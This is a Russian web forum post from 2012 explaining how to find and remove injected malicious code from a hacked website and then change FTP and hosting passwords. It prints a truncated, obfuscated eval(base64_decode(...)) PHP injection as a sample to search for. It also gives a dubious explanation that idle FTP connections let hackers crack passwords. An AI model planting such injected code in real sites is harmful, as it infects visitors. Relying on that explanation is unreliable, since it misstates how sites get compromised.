Отключен JavaScript

У вас отключен JavaScript. Некоторые возможности системы не будут работать. Пожалуйста, включите JavaScript для получения доступа ко всем функциям.

1

Как избавиться от вредоносного кода на сайте

Автор MARY, 20 Янв 2012 13:22

Вы не можете ответить в тему

В этой теме нет ответов

#1 MARY

Администратор

Администратор
3 939 сообщений

Пол:Женщина
CMS:
Фотошоп:

Отправлено 20 Январь 2012 - 13:22

Столкнулась тут с такой проблемой: на сайте возникает переадресация на порно-сайты и т.п.
Также с яндекса может прийти письмо о том, что сайт заражен.

Как бороться:

Заходим на фтп и сортируем файлы и папки по дате. И начинаем просматривать самые новые файлы (если не знаете точно, когда это все появилось, проще всего сделать бэкап сайта, скачать к себе на комп и просматривать файлы по поиску).
В файлах ищем примерно такое:

eval (base64_decode («aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJE
dMT0JBTFNbJ21yX25vJ10pKXskR0xPQkFMU1snbXJfbm8nXT0xO2lmKCFmdW5jdGlvbl9leGlzdHMoJ2
1yb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXtmdW5jdGlvbiBnbWwoKXtpZiAoIXN0cmlz
dHIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCJnb29nbGVib3QiKSYmKCFzdHJpc3RyKCRfU
0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpe3JldHVybiBiYXNlNjRfZGVjb2RlKCJQSE
5qY21sd2RDQnpjbU05SW1oMGRIQTZMeTlwYm5OdmJXNXBZV0p2YkdScGJtWnZibVYwTG1OdmJT
OXRiUzV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTt9cmV0dXJuICIiO319aWYoIWZ1bmN0aW9uX2
V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUN
BMjNDOEY2MTFBNTY0Njg0Qyl7JFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD
1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKT
skUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyRSQTNENTJFNTJBND
g5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDtpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5N
jJBRjVEJjQpeyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndi
csc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyRS
NjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFR
kVBRDA3QTREOTFFMjlFQlsxXTskUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQU
Q5Kz0yKyRSNjNC=»));

Обычно эта билиберда стоит в начале файла. Ее нужно удалить и файлы закачать обратно на сервер. Этот код может находится в файлах с любым расширением, так что просматривать нужно все.

После этого меняем все пароли на фтп и в панель доступа хостера.

С яндекса еще некоторое время могут приходить письма, но это быстро прекратиться. Чтобы ускорить этот процесс, можно заказать у яндекса перепроверку сайта на вредоносный код.

Из-за чего это возникает:

Обычно на фтп все заходят через программы доступа (коммандер, файлзилла и т. п.). Так вот, если оставить такую программу с активным соединением надолго, хакеры успевают хакнуть ваш пароль. Поэтому зашли на фтп, сделали, что нужно и сразу отключились.
А чтобы уж совсем исключить подобное, не сохраняйте пароли в программах доступа, а каждый раз вводите их вручную. Не оставляйте хакерам шансов!

Наверх

Обратно в Скрипты

Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 скрытых пользователей